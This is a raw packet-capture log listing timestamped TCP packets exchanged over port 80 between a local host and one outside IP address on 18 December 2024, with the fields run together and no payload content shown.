                                                                                                                                                                  Dec 18, 2024 11:09:31.405226946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.406270027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.406281948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.406335115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.406335115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.407344103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.407409906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.415524006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.415537119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.415617943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.415942907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.416060925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.416081905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.416204929 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.416600943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.416651964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.416722059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.416901112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.417689085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.417737961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.417773008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.417773008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.418770075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.418783903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.418829918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.418829918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.419855118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.419867039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.419920921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.420731068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.420774937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.420855999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.420895100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.421502113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.421600103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.421622038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.421674967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.422595978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.422674894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.422700882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.422744036 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.423544884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.423588037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.423610926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.423672915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.424531937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.424544096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.424583912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.424583912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.425669909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.425682068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.425834894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.426489115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.426542044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.426577091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.426577091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.427598000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.427614927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.427644014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.427685022 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.428421974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.428648949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.428714991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.428797960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.429429054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.429440975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.429486990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.430417061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.430459023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.430490017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.430561066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.432301998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.432313919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.432326078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.432352066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.432423115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.433434010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.433449030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.433460951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.433476925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.433501959 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.433501959 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.435399055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.435410976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.435421944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.435448885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.435482979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.436362982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.436373949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.436384916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.436425924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.436425924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.438215017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.438226938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.438240051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.438261032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.438410044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.438513041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.438730955 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.440176010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.440187931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.440198898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.440221071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.440344095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.441229105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.441240072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.441251040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.441292048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.441292048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.443061113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.443072081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.443104029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.443248034 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.443259954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.443309069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.443309069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.444266081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.444338083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.445425034 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.445436954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.445450068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.445494890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.445494890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.447052002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.447063923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.447073936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.447133064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.447247982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.447505951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.449007988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.449021101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.449032068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.449065924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.449065924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.449269056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.450109005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.450120926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.450133085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.450154066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.450176001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.451946020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.451957941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.451970100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.452004910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.452004910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.453032970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.453043938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.453056097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.453089952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.453089952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.586498976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.586518049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.586529970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.586563110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.586730003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.586867094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.586936951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.587541103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.587579966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.588531971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.588548899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.588562012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.588613987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.588613987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.590502024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.590513945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.590526104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.590548038 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.590656042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.591659069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.591675043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.591686964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.591701984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.591725111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.591725111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.593274117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.593287945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.593324900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.593539000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.593550920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.593904018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.595078945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.595089912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.596297026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.596307993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.596321106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.596335888 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.596335888 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.597359896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.597371101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.597383022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.597402096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.597402096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.599482059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.599534988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.599577904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.607302904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.607321978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.607333899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.607364893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.607415915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.607415915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.608242989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.608253956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.608266115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.608305931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.608305931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.610497952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.610508919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.610521078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.611481905 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.611504078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.612438917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.612449884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.612461090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.612493038 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.612777948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.613331079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.613343000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.613354921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.613389015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.613389015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.614518881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.614531040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.616000891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.616014957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.616027117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.616041899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.616041899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.617079973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.617090940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.617101908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.617127895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.617127895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.617486000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.618954897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.618967056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.618978024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.618994951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.620134115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.620151043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.620162010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.620170116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.620170116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.620197058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.620197058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.621965885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.621978998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.621989965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.622026920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.622026920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.623016119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.623027086 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.623038054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.623076916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.623076916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.624847889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.624859095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.624875069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.624907970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.624907970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.625899076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.625912905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.625925064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.625952005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.625952005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.627764940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.627777100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.627788067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.627806902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.628880978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.628892899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.628911972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.628918886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.628918886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.628947020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.628947020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.630693913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.630706072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.630717993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.630758047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.630758047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.631807089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.631818056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.631829977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.631870031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.631870031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.633637905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.633652925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.633663893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.633693933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.633693933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.634700060 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.634711981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.634722948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.634754896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.634754896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.636610985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.636622906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.636634111 CET804991231.41.244.11192.168.2.6
